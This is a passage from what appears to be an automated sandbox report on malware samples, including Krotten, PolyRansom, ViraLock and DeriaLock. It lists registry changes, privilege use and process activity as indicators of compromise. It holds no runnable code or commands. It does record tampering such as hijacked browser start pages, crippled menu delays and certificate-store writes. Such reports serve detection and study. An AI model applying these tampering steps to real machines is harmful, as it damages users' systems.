Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosDate | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | Installer.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Bios | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Installer.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | Installer.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardVersion | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosVendor | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosVersion | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | Installer.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
-
Kills process with taskkill 1 IoCs
Processes:
taskkill.exe
pid | process
3332 | taskkill.exe
-
Modifies Control Panel 6 IoCs
Processes:
Endermanch@Krotten.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" | Endermanch@Krotten.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" | Endermanch@Krotten.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop | Endermanch@Krotten.exe
-
Processes:
Endermanch@Krotten.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" | Endermanch@Krotten.exe
Key created | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" | Endermanch@Krotten.exe
Key created | \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main | Endermanch@Krotten.exe
-
Modifies Internet Explorer start page 1 TTPs 2 IoCs
Processes:
Endermanch@Krotten.exe
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | Endermanch@Krotten.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" | Endermanch@Krotten.exe
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
ProductAgentService.exeDrvInst.exeDrvInst.exeWatchDog.exeDiscoverySrv.exeProductAgentUI.exeLogonUI.exeDiscoverySrv.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WatchDog.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DiscoverySrv.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DiscoverySrv.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WatchDog.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates ProductAgentUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust 
WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DiscoverySrv.exe -
Modifies registry class 64 IoCs
Processes:
regsvr32.exeuninstall.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ProgID\ = "ProductAgent.UPNPDevice.1" regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r00 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r03 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r09 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r10\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r14\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ = "UPNPDevice Class" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bz2\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r26 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.z uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.001 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tzst\ = "WinRAR" uninstall.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\ProgID regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ProductAgent.UPNPDevice\CurVer regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\TypeLib\ = "{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}\1.0\0\win32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lz uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r08\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open uninstall.exe Key created 
\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C} regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\InProcServer32 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\InprocServer32\ = "C:\\Program Files\\Bitdefender Agent\\26.0.1.231\\DiscoveryComp.dll" regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ShellNew\FileName = "C:\\Program Files\\WinRAR\\rarnew.dat" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CB23A858-ED47-425B-AAD2-D809C11E1DA6}\Programmable regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\ProxyStubClsid32 regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r02 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.uue uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{753FDF26-44A2-47B5-B65E-2E207BD5BC0C}\TypeLib regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r07 uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.z\ = "WinRAR" uninstall.exe Set 
value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Program Files\\WinRAR\\WinRAR.exe,0" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D19631EE-4E47-4BA9-BA2E-C5FF909E2C61}\1.0 regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r12 uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.arj uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" uninstall.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\ProductAgent.UPNPDevice regsvr32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r02\ = "WinRAR" uninstall.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR" uninstall.exe -
Modifies registry key 1 TTPs 6 IoCs
Processes:
reg.exe, reg.exe, reg.exe, reg.exe, reg.exe, reg.exe
pid | process
436 | reg.exe
3304 | reg.exe
2084 | reg.exe
2164 | reg.exe
1000 | reg.exe
2608 | reg.exe
-
Processes:
DiscoverySrv.exeinstaller.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] DiscoverySrv.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B installer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = [certificate blob omitted] installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 DiscoverySrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] DiscoverySrv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [certificate blob omitted] DiscoverySrv.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
smi_gui.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeProductAgentService.exechrome.exechrome.exechrome.exeInstaller.exechrome.exechrome.exechrome.exechrome.exeEndermanch@PolyRansom.exeEndermanch@ViraLock.exepid process 2380 smi_gui.exe 3644 chrome.exe 3644 chrome.exe 1160 chrome.exe 1160 chrome.exe 4088 chrome.exe 4088 chrome.exe 1592 chrome.exe 1592 chrome.exe 3508 chrome.exe 3508 chrome.exe 952 chrome.exe 952 chrome.exe 4128 chrome.exe 4128 chrome.exe 1640 chrome.exe 1640 chrome.exe 3744 chrome.exe 3744 chrome.exe 1368 chrome.exe 1368 chrome.exe 696 chrome.exe 696 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 2328 chrome.exe 2328 chrome.exe 1976 chrome.exe 1976 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4312 chrome.exe 4312 chrome.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 3504 Installer.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 4440 ProductAgentService.exe 768 chrome.exe 768 chrome.exe 640 chrome.exe 640 chrome.exe 1048 chrome.exe 1048 chrome.exe 2484 chrome.exe 2484 chrome.exe 3728 Endermanch@PolyRansom.exe 3728 Endermanch@PolyRansom.exe 820 Endermanch@ViraLock.exe 820 Endermanch@ViraLock.exe 820 Endermanch@ViraLock.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
WinRAR.exepid process 4712 WinRAR.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
fltmc.exeInstaller.exepid process 3124 fltmc.exe 3504 Installer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 31 IoCs
Processes:
chrome.exechrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe 640 chrome.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
smi_gui.exeinstaller.exeProductAgentService.exeInstaller.exesvchost.exefltmc.exefltmc.exeEndermanch@Krotten.exesys3.exeFantom.exerundll32.exemsiexec.exeEndermanch@DeriaLock.exedescription pid process Token: SeDebugPrivilege 2380 smi_gui.exe Token: SeDebugPrivilege 4952 installer.exe Token: 35 4952 installer.exe Token: 35 4952 installer.exe Token: 35 4952 installer.exe Token: SeRestorePrivilege 4952 installer.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 4440 ProductAgentService.exe Token: SeDebugPrivilege 3504 Installer.exe Token: SeSecurityPrivilege 3504 Installer.exe Token: SeAuditPrivilege 3064 svchost.exe Token: SeSecurityPrivilege 3064 svchost.exe Token: SeLoadDriverPrivilege 3124 fltmc.exe Token: SeDebugPrivilege 3504 Installer.exe Token: SeLoadDriverPrivilege 3504 Installer.exe Token: SeLoadDriverPrivilege 2716 fltmc.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeBackupPrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeBackupPrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeRestorePrivilege 3504 Installer.exe Token: SeSystemtimePrivilege 4424 Endermanch@Krotten.exe Token: SeShutdownPrivilege 180 sys3.exe Token: SeDebugPrivilege 1432 Fantom.exe Token: SeShutdownPrivilege 
5100 rundll32.exe Token: SeDebugPrivilege 5100 rundll32.exe Token: SeTcbPrivilege 5100 rundll32.exe Token: SeSecurityPrivilege 1576 msiexec.exe Token: SeDebugPrivilege 3496 Endermanch@DeriaLock.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exepid process 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe 1160 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
